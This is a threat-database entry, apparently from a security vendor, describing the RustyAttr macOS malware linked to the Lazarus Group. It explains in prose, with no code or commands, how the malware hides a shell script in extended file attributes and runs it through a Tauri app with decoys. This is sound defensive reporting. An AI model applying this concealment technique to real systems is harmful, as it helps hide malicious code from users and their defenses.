Threat Database Mac Malware RustyAttr Mac Malware

RustyAttr Mac Malware

Researchers have identified that threat actors are now employing an innovative method that takes advantage of extended attributes in macOS files to conceal a new threat known as RustyAttr.

This new campaign has been reasonably linked to the well-known Lazarus Group, which is associated with North Korea. The attribution is based on observed similarities in infrastructure and tactics related to earlier campaigns, including RustBucket.

Extended attributes refer to supplementary metadata linked to files and directories, which can be accessed using a command known as xattr. These attributes are typically used to store information beyond standard details like file size, timestamps, and permissions.

Threatening Applications Share Several Connections

Researchers have uncovered threatening applications created with Tauri, a cross-platform framework for desktop applications, and signed using a leaked certificate that Apple has since revoked. These applications include an extended attribute designed to retrieve and execute a shell script.

When the shell script runs, it also activates a decoy intended to divert attention. This decoy may present an error message stating, "This app does not support this version," or display an innocuous PDF related to gaming project development and funding.

How the RustyAttr Attack Proceeds

When the application is launched, the Tauri framework attempts to display an HTML Web page using a WebView, with the threat actor selecting a random template sourced from the Internet.

What's particularly noteworthy is that these webpages are designed to load unsafe JavaScript, which extracts the content of the extended attributes and executes it through a Rust backend. However, the fake Web page is only shown if no extended attributes are present.

The campaign's ultimate objective remains uncertain, especially since there is no evidence of additional payloads or confirmed victims.

Thankfully, macOS systems offer some protection against the discovered samples. To initiate the attack, users would need to disable Gatekeeper by bypassing the built-in malware safeguards. Some level of user interaction and social engineering will likely be required to persuade victims to take these actions.

Trending

Most Viewed

Loading...